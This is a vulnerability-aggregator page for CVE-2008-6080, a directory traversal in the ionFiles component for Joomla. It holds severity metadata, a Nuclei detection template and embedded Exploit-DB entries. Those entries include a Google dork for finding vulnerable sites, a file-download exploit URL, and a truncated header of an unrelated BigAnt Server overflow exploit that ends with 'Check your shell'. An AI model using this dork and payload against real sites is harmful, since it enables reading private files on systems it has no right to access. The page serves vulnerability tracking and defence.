CVE-2008-6080
published 2009-02-06CVE-2008-6080: Directory traversal vulnerability in download.php in the ionFiles (com_ionfiles) 4.4.2 component for Joomla! allows remote attackers to read arbitrary files…
PriorityP337medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
10.64%
95.2th percentile
Directory traversal vulnerability in download.php in the ionFiles (com_ionfiles) 4.4.2 component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| codecall | com_ionfiles | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Joomla! Component ionFiles 4.4.2 - File Disclosure
exploitdb·2008-10-22
CVE-2008-6080 Joomla! Component ionFiles 4.4.2 - File Disclosure
Joomla! Component ionFiles 4.4.2 - File Disclosure
---
[o]------------------------------------------------------------------------------------[x]
| Arbitrary File Download Vulnerability |
[o]------------------------------------------------------------------------------------[o]
| Software : ionFiles 4.4.2 Component for Joomla! CMS |
| Vendor : http://forum.codecall.net/ |
| Date : 23 October 2008 |
| Author : Vrs-hCk |
| Contact : d00r[at]telkom[dot]net |
[o]------------------------------------------------------------------------------------[o]
[»] Google Dork
inurl:com_ionfiles
[»] Vulnerable
./download.php
Line 32: $file = $_GET['file'];
Line 33: $download = $_GET['download'];
Line 66 - 91
[»] Exploit
http://[site]/[path]/com_ionfiles/download.php?file=[path_file]&download=1
Exploit-DB
BigAnt Server 2.2 - Remote Overflow (SEH)
exploitdb·2008-04-15
CVE-2008-1914 BigAnt Server 2.2 - Remote Overflow (SEH)
BigAnt Server 2.2 - Remote Overflow (SEH)
---
#!/usr/bin/python
###############################################################################
# BigAnt Server Ver 2.2 PreAuth Remote SEH Overflow (0day)
# Matteo Memelli aka ryujin
# www.be4mind.com - www.gray-world.net
# 04/13/2008
# Tested on Windows 2000 Sp4 English
# Vulnerable process is AntServer.exe
# Offset for SEH overwrite is 954 Bytes
#
#------------------------------------------------------------------------------
# muts you gave me the wrong pill! it's your fault!!!
# I wanna go back to the matrix
#------------------------------------------------------------------------------
#
# bt ~ # ./antserver_exploit.py -H 192.168.1.195 -P 6080
# [+] Connecting to host...
# [+] Overflowing the buffer...
# [+] Done! Check your shell on 1
Nuclei
Joomla! ionFiles 4.4.2 - Local File Inclusion
nuclei·CVSS 5.0
CVE-2008-6080 [MEDIUM] Joomla! ionFiles 4.4.2 - Local File Inclusion
Joomla! ionFiles 4.4.2 - Local File Inclusion
Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
Template:
id: CVE-2008-6080
info:
name: Joomla! ionFiles 4.4.2 - Local File Inclusion
author: daffainfo
severity: medium
description: Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
remediation: |
Update Joomla! ionFiles to the latest version or
http://secunia.com/advisories/32377http://www.securityfocus.com/bid/31877https://exchange.xforce.ibmcloud.com/vulnerabilities/46039https://www.exploit-db.com/exploits/6809http://secunia.com/advisories/32377http://www.securityfocus.com/bid/31877https://exchange.xforce.ibmcloud.com/vulnerabilities/46039https://www.exploit-db.com/exploits/6809
2009-02-06
Published